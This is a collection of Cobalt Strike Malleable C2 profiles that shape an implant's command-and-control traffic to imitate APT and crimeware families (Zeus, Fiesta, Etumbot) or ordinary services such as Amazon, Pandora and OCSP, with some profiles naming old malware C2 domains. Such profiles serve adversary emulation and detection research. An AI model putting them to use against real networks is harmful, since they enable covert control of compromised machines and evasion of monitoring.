├── APT ├── comfoo.profile ├── etumbot.profile ├── pitty_tiger.profile ├── putter.profile ├── string_of_paerls.profile └── taidoor.profile ├── crimeware ├── asprox.profile ├── fiesta.profile ├── fiesta2.profile ├── magnitude.profile └── zeus.profile └── normal ├── amazon.profile ├── oscp.profile ├── pandora.profile ├── rtmp.profile └── safebrowsing.profile /APT/comfoo.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Comfoo profile 3 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "20"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"; 12 | 13 | http-get { 14 | 15 | set uri "/CWoNaJLBo/VTNeWw11212/"; 16 | 17 | client { 18 | 19 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 20 | header "Accept-Language" "en-en"; 21 | header "Connection" "Keel-Alive"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbiosu; 26 | append "/UTWOqVQ132/"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "Apache/2.0.50 (Unix)"; 34 | header "Keep-Alive" "timeout=15, max=90"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/CWoNaJLBo/VTNeWw11213/"; 45 | 46 | client { 47 | 48 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 49 | header "Accept-Language" "en-en"; 50 | header "Connection" "Keel-Alive"; 51 | header "Cache-Control" "no-cache"; 52 | 53 | id { 54 | netbiosu; 55 | append "/UTWOqVQ132/"; 56 | uri-append; 57 | } 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | 64 | server { 65 | 66 | header "Server" "Apache/2.0.50 (Unix)"; 67 | header "Keep-Alive" "timeout=15, max=90"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/etumbot.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Etumbot Profile 3 | # http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "5000"; 9 | set jitter "0"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; 12 | 13 | http-get { 14 | 15 | set uri "/image/"; 16 | 17 | client { 18 | 19 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; 20 | header "Referer" "http://www.google.com"; 21 | header "Pragma" "no-cache"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbios; 26 | append "-.jpg"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Content-Type" "img/jpg"; 34 | header "Server" "Microsoft-IIS/6.0"; 35 | header "X-Powered-By" "ASP.NET"; 36 | 37 | output { 38 | base64; 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | set uri "/history/"; 46 | 47 | client { 48 | 49 | header "Content-Type" "application/octet-stream"; 50 | header "Referer" "http://www.google.com"; 51 | header "Pragma" "no-cache"; 52 | header "Cache-Control" "no-cache"; 53 | 54 | id { 55 | netbiosu; 56 | append ".asp"; 57 | uri-append; 58 | } 59 | 60 | output { 61 | base64; 62 | print; 63 | } 64 | } 65 | 66 | server { 67 | 68 | header "Content-Type" "img/jpg"; 69 | header "Server" "Microsoft-IIS/6.0"; 70 | header "X-Powered-By" "ASP.NET"; 71 | 72 | output { 73 | base64; 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /APT/pitty_tiger.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Pitty Tiger RAT profile 3 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 4 | # 5 | # One of several RATs used by the Pitty Tiger campaign 6 | # 7 | # Author: @harmj0y 8 | # 9 | 10 | set sleeptime "30000"; # use a ~30s delay between callbacks 11 | set jitter "20"; 12 | set maxdns "255"; 13 | set useragent "Microsoft Internet Explorer"; 14 | 15 | http-get { 16 | 17 | set uri "/FC001/JOHN"; 18 | 19 | client { 20 | 21 | header "Host" "newb02.skypetm.com.tw"; 22 | header "Connection" "Keel-Alive"; 23 | 24 | metadata { 25 | netbiosu; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Connection" "Keel-Alive"; 33 | header "Content-Type" "text/html"; 34 | header "Server" "IIS5.0"; 35 | 36 | output { 37 | base64; 38 | print; 39 | } 40 | } 41 | } 42 | 43 | http-post { 44 | set uri "/FC001/JOHN-"; 45 | 46 | client { 47 | 48 | header "Host" "newb02.skypetm.com.tw"; 49 | header "Connection" "Keel-Alive"; 50 | 51 | id { 52 | netbiosu; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | 64 | header "Connection" "Keel-Alive"; 65 | header "Content-Type" "text/html"; 66 | header "Server" "IIS5.0"; 67 | 68 | output { 69 | base64; 70 | print; 71 | } 72 | } 73 | } 74 | 75 | -------------------------------------------------------------------------------- /APT/putter.profile: -------------------------------------------------------------------------------- 1 | # Putter Panda HTTPCLIENT Profile 2 | # http://resources.crowdstrike.com/putterpanda/ 3 | 4 | # 500ms is default callback for this Web C2 shell 5 | set sleeptime "500"; 6 | 7 | http-get { 8 | # Beacon will randomly choose from this pool of URIs 9 | set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx"; 10 | 11 | client { 12 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 13 | 14 | # deliberate attempt to reproduce bug in HTTPCLIENT 15 | header "Accept" "*/*, ..., ......, ."; 16 | 17 | # encode session metadata into tmp var 18 | metadata { 19 | netbiosu; 20 | parameter "tmp"; 21 | } 22 | } 23 | 24 | # no special server side indicators as the report didn't say anything one way 25 | # or the other about these. 26 | server { 27 | header "Content-Type" "application/octet-stream"; 28 | 29 | output { 30 | print; 31 | } 32 | } 33 | } 34 | 35 | http-post { 36 | set uri "/MicrosoftUpdate/GetUpdate/KB"; 37 | 38 | client { 39 | header "Content-Type" "application/octet-stream"; 40 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 41 | 42 | id { 43 | append "/default.asp"; 44 | uri-append; 45 | } 46 | 47 | output { 48 | print; 49 | } 50 | } 51 | 52 | server { 53 | header "Content-Type" "text/html"; 54 | 55 | output { 56 | print; 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /APT/string_of_paerls.profile: -------------------------------------------------------------------------------- 1 | # 2 | # String of Paerls profile 3 | # http://blogs.cisco.com/security/a-string-of-paerls/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30 second main interval 9 | set jitter "30"; # 35% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0"; 12 | 13 | http-get { 14 | 15 | # GET request modeled as well as possible based on incomplete information 16 | set uri "/2/R.exe"; 17 | 18 | client { 19 | 20 | header "Content-Type" "application/x-www-form-urlencoded"; 21 | 22 | # encode session metadata 23 | metadata { 24 | base64; 25 | header "Cookie"; 26 | } 27 | } 28 | 29 | server { 30 | header "Server" "Apache/2"; 31 | header "X-Powered-By" "PHP/5.3.28"; 32 | header "Vary" "User-Agent"; 33 | header "Content-Type" "application/octet-stream"; 34 | 35 | output { 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | 43 | set uri "/boss/image.php"; 44 | 45 | client { 46 | 47 | header "Content-Type" "application/x-www-form-urlencoded"; 48 | 49 | id { 50 | netbios; 51 | parameter "id"; 52 | } 53 | 54 | output { 55 | base64; 56 | print; 57 | } 58 | } 59 | 60 | server { 61 | header "Server" "Apache/2"; 62 | header "X-Powered-By" "PHP/5.3.28"; 63 | header "Vary" "User-Agent"; 64 | header "Content-Type" "application/octet-stream"; 65 | 66 | output { 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /APT/taidoor.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Taidoor Profile 3 | # http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "40000"; # use a ~40 second main interval 9 | set jitter "35"; # 35% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 12 | 13 | http-get { 14 | 15 | set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp"; 16 | 17 | client { 18 | 19 | header "Connection" "Keep-Alive"; 20 | header "Cache-Control" "no-cache"; 21 | 22 | # encode session metadata 23 | metadata { 24 | netbiosu; 25 | parameter "mn"; 26 | } 27 | } 28 | 29 | # no special server side indicators as the report didn't say anything one way 30 | # or the other about these. 31 | server { 32 | header "Server" "Microsoft-IIS/5.0"; 33 | header "Content-Type" "text/html"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | base64; 38 | prepend "\n"; 43 | append "\n"; 44 | append "\n"; 45 | print; 46 | } 47 | } 48 | } 49 | 50 | http-post { 51 | set uri "/submit.jsp"; 52 | 53 | client { 54 | 55 | header "Connection" "Keep-Alive"; 56 | header "Cache-Control" "no-cache"; 57 | 58 | id { 59 | netbios; 60 | parameter "du"; 61 | } 62 | 63 | output { 64 | print; 65 | } 66 | } 67 | 68 | server { 69 | header "Server" "Microsoft-IIS/5.0"; 70 | header "Content-Type" "text/html"; 71 | header "Connection" "close"; 72 | 73 | output { 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /crimeware/asprox.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Asprox botnet traffic profile 3 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "20"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; 13 | 14 | http-get { 15 | 16 | set uri "/"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | header "Content-Transfer-Encoding" "base64"; 23 | header "Connection" "Keep-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "nginx/1.2.5"; 34 | header "Content-Type" "text/html"; 35 | header "X-Powered-By" "PHP/5.4.4-7"; 36 | header "Vary" "Accept-Encoding"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | # random hash to try to simulate the post uri in the report 48 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; 49 | 50 | client { 51 | 52 | header "Accept" "*/*"; 53 | header "Content-Type" "application/x-www-form-urlencoded"; 54 | header "Content-Transfer-Encoding" "base64"; 55 | header "Connection" "Keep-Alive"; 56 | 57 | id { 58 | parameter "id"; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Server" "nginx/1.2.5"; 70 | header "Content-Type" "text/html"; 71 | header "X-Powered-By" "PHP/5.4.4-7"; 72 | header "Vary" "Accept-Encoding"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /crimeware/fiesta.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; 12 | 13 | http-get { 14 | 15 | set uri "/rmvk30g/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; 20 | header "Connection" "keep-alive"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";1;4;1"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2.2.15 (CentOS)"; 32 | header "X-Powered-By" "PHP/5.3.27"; 33 | header "Content-Type" "application/octet-stream"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/"; 45 | 46 | client { 47 | 48 | # fake out a different user agent for the post back 49 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; 50 | 51 | id { 52 | netbios; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | header "Server" "nginx/1.4.2"; 64 | header "Content-Type" "text/html"; 65 | header "Connection" "close"; 66 | 67 | output { 68 | base64; 69 | print; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /crimeware/fiesta2.profile: -------------------------------------------------------------------------------- 1 | # 2 | # A second Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | 12 | http-get { 13 | 14 | set uri "/v20idaf/"; 15 | 16 | client { 17 | # mimic this Fiesta instance's header information 18 | header "Accept" "*/*"; 19 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 20 | 21 | # encode session metadata as close as we can to a Fiesta URI request 22 | metadata { 23 | netbios; 24 | append ";112202;228"; 25 | uri-append; 26 | } 27 | } 28 | 29 | server { 30 | header "Server" "nginx/1.4.4"; 31 | header "Content-Type" "application/octet-stream"; 32 | header "Connection" "close"; 33 | 34 | output { 35 | print; 36 | } 37 | } 38 | } 39 | 40 | http-post { 41 | 42 | set uri "/"; 43 | 44 | client { 45 | 46 | header "Accept" "*/*"; 47 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 48 | 49 | id { 50 | netbios; 51 | uri-append; 52 | } 53 | 54 | output { 55 | base64; 56 | print; 57 | } 58 | } 59 | 60 | server { 61 | header "Server" "nginx/1.4.4"; 62 | header "Content-Type" "application/octet-stream"; 63 | header "Connection" "close"; 64 | 65 | output { 66 | print; 67 | } 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /crimeware/magnitude.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Magnitude Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/06/17/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "45000"; # use a ~45s delay between callbacks 9 | set jitter "50"; # throw in a 50% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 12 | 13 | http-get { 14 | 15 | set uri "/themes/index.php"; 16 | 17 | client { 18 | 19 | header "Accept" "image/jpeg, application/*"; 20 | header "Referer" "http://www.bankofbotswana.bw/"; 21 | header "Accept-Encoding" "gzip, deflate"; 22 | 23 | # throw in a known bad malware domain 24 | header "Host" "wilfredcostume.bamoon.com"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "id"; 29 | } 30 | } 31 | 32 | server { 33 | header "Server" "Apache/2.2.17 (Ubuntu)"; 34 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 35 | header "Content-Encoding" "gzip"; 36 | header "Content-Type" "text/html"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/work/1.php"; 47 | 48 | client { 49 | 50 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 51 | header "Accept-Language" "en-US;q=0.5,en;q=0.3"; 52 | header "Accept-Encoding" "gzip, deflate"; 53 | header "Content-Type" "application/octet-stream"; 54 | 55 | id { 56 | netbiosu; 57 | parameter "sid"; 58 | } 59 | 60 | output { 61 | print; 62 | } 63 | } 64 | 65 | server { 66 | 67 | header "Server" "Apache/2.2.17 (Ubuntu)"; 68 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 69 | header "Content-Encoding" "gzip"; 70 | header "Content-Type" "text/html"; 71 | 72 | output { 73 | print; 74 | } 75 | } 76 | } 77 | 78 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | 9 | set sleeptime "30000"; 10 | set jitter "5"; 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"; 13 | 14 | http-get { 15 | 16 | set uri "/metro91/admin/1/ppptp.jpg"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Connection" "Close"; 22 | 23 | # throw in a known/old Zeus C2 domain 24 | header "Host" "mahamaya1ifesciences.com"; 25 | header "Cache-Control" "no-cache"; 26 | 27 | metadata { 28 | base64; 29 | header "Cookie"; 30 | } 31 | } 32 | 33 | server { 34 | header "Server" "nginx/1.0.4"; 35 | header "Content-Type" "text/html"; 36 | header "Connection" "close"; 37 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 38 | 39 | output { 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | set uri "/metro91/admin/1/secure.php"; 48 | 49 | client { 50 | 51 | header "Accept" "*/*"; 52 | header "Connection" "Keep-Alive"; 53 | 54 | # throw in a known/old Zeus C2 domain 55 | header "Host" "mahamaya1ifesciences.com"; 56 | header "Cache-Control" "no-cache"; 57 | 58 | id { 59 | netbios; 60 | parameter "id"; 61 | } 62 | 63 | output { 64 | print; 65 | } 66 | } 67 | 68 | server { 69 | header "Server" "nginx/1.0.4"; 70 | header "Content-Type" "text/html"; 71 | header "Connection" "close"; 72 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 73 | 74 | output { 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /normal/amazon.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Amazon browsing traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Host" "www.amazon.com"; 20 | 21 | metadata { 22 | base64; 23 | prepend "session-token="; 24 | prepend "skin=noskin;"; 25 | append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996"; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Server" "Server"; 33 | header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT"; 34 | header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Content-Encoding" "gzip"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/N4215/adj/amzn.us.sr.aps"; 47 | 48 | client { 49 | 50 | header "Accept" "*/*"; 51 | header "Content-Type" "text/xml"; 52 | header "X-Requested-With" "XMLHttpRequest"; 53 | header "Host" "www.amazon.com"; 54 | 55 | parameter "sz" "160x600"; 56 | parameter "oe" "oe=ISO-8859-1;"; 57 | 58 | id { 59 | parameter "sn"; 60 | } 61 | 62 | parameter "s" "3717"; 63 | parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | 71 | server { 72 | 73 | header "Server" "Server"; 74 | header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT"; 75 | header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 76 | header "X-Frame-Options" "SAMEORIGIN"; 77 | header "x-ua-compatible" "IE=edge"; 78 | 79 | output { 80 | print; 81 | } 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /normal/oscp.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Online Certificate Status Protocol (OCSP) Profile 3 | # http://tools.ietf.org/html/rfc6960 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "20000"; # Use a 20s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Microsoft-CryptoAPI/6.1"; 12 | 13 | 14 | http-get { 15 | 16 | set uri "/oscp/"; 17 | 18 | client { 19 | header "Accept" "*/*"; 20 | header "Host" "ocsp.verisign.com"; 21 | 22 | metadata { 23 | netbios; 24 | uri-append; 25 | } 26 | } 27 | 28 | server { 29 | header "Content-Type" "application/ocsp-response"; 30 | header "content-transfer-encoding" "binary"; 31 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 32 | header "Connection" "keep-alive"; 33 | 34 | output { 35 | print; 36 | } 37 | } 38 | } 39 | 40 | http-post { 41 | 42 | set uri "/oscp/a/"; 43 | 44 | client { 45 | 46 | header "Accept" "*/*"; 47 | header "Host" "ocsp.verisign.com"; 48 | 49 | id { 50 | netbios; 51 | uri-append; 52 | } 53 | 54 | output { 55 | print; 56 | } 57 | } 58 | 59 | server { 60 | header "Content-Type" "application/ocsp-response"; 61 | header "content-transfer-encoding" "binary"; 62 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 63 | header "Connection" "keep-alive"; 64 | 65 | output { 66 | print; 67 | } 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /normal/pandora.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Standard Pandora traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "1000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/access/"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "GetContentFeatures.DLNA.ORG" "1"; 20 | header "Host" "audio-sv5-t1-3.pandora.com"; 21 | header "Cookie" " __utma=210077622.1732439995.1433201462.1403204372.1385202493.2;"; 22 | 23 | parameter "version" "4"; 24 | parameter "lid" "1582502724"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "token"; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Server" "Apache"; 35 | header "Cache-Control" "no-cache, no-store, must-revalidate, max-age=-1"; 36 | header "Pragma" "no-cache, no-store"; 37 | #header "Expires" "-1"; 38 | header "Connection" "close"; 39 | header "Content-Type" "audio/mp4"; 40 | 41 | output { 42 | 43 | # mp4 header 44 | # 0000000: 0000 001c 6674 7970 6d70 3432 0000 0001 ....ftypmp42.... 45 | # 0000010: 4d34 5620 6d70 3432 6973 6f6d 0001 6fd9 M4V mp42isom..o. 46 | 47 | prepend "\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64"; 48 | prepend "\x4d\x34\x56\x20\x6d\x70\x34\x32\x69\x73\x6f\x6d\x00\x01\x6f\xd9"; 49 | prepend "\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x01"; 50 | 51 | print; 52 | } 53 | } 54 | } 55 | 56 | http-post { 57 | 58 | set uri "/radio/xmlrpc/v35"; 59 | 60 | client { 61 | 62 | header "Accept" "*/*"; 63 | header "Content-Type" "text/xml"; 64 | header "X-Requested-With" "XMLHttpRequest"; 65 | header "Host" "www.pandora.com"; 66 | 67 | id { 68 | parameter "rid"; 69 | } 70 | 71 | parameter "lid" "1582502724"; 72 | parameter "method" "getSearchRecommendations"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | 80 | server { 81 | 82 | header "Content-Type" "text/xml"; 83 | header "Cache-Control" "no-cache, no-store, no-transform, must-revalidate, max-age=0"; 84 | header "Expires" "-1"; 85 | header "Vary" "Accept-Encoding"; 86 | header "Content-Encoding" "gzip"; 87 | 88 | output { 89 | print; 90 | } 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /normal/rtmp.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Adode Real-Time-Messaging-Protcol (RTMP) profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Shockwave Flash"; 11 | 12 | http-get { 13 | 14 | set uri "/idle/1376547834/1"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Connection" "Keep-Alive"; 20 | header "Cache-Control" "no-cache"; 21 | header "Content-Type" "application/x-fcs"; 22 | 23 | metadata { 24 | base64; 25 | header "Cookie"; 26 | } 27 | } 28 | 29 | server { 30 | 31 | header "Content-Type" "application/x-fcs"; 32 | header "Connection" "Keep-Alive"; 33 | header "Server" "FlashCom/3.5.7"; 34 | header "Cache-Control" "no-cache"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/send/1376547834/"; 45 | 46 | client { 47 | 48 | header "Accept" "*/*"; 49 | header "Connection" "Keep-Alive"; 50 | header "Cache-Control" "no-cache"; 51 | header "Content-Type" "application/x-fcs"; 52 | 53 | id { 54 | uri-append; 55 | } 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | 64 | header "Content-Type" "application/x-fcs"; 65 | header "Connection" "Keep-Alive"; 66 | header "Server" "FlashCom/3.5.7"; 67 | header "Cache-Control" "no-cache"; 68 | 69 | output { 70 | print; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /normal/safebrowsing.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Safebrowsing Comms profile 3 | # https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # Use a 30s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 12 | 13 | http-get { 14 | 15 | # change/randomize this as you wish 16 | set uri "/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2"; 17 | 18 | client { 19 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 20 | header "Accept-Language" "en-US,en;q=0.5"; 21 | header "Accept-Encoding" "gzip, deflate"; 22 | 23 | metadata { 24 | netbios; 25 | prepend "PREF=ID="; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/vnd.google.safebrowsing-chunk"; 32 | header "X-Content-Type-Options" "nosniff"; 33 | header "Content-Encoding" "gzip"; 34 | header "X-XSS-Protection" "1; mode=block"; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Cache-Control" "public,max-age=172800"; 37 | header "Age" "1222"; 38 | header "Alternate-Protocol" "80:quic"; 39 | 40 | output { 41 | print; 42 | } 43 | } 44 | } 45 | 46 | http-post { 47 | 48 | set uri "/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4"; 49 | 50 | client { 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US,en;q=0.5"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | 55 | id { 56 | netbios; 57 | prepend "U=779b64e1a7ed737a"; 58 | prepend "PREF=ID="; 59 | header "Cookie"; 60 | } 61 | 62 | output { 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | header "Content-Type" "application/vnd.google.safebrowsing-chunk"; 69 | header 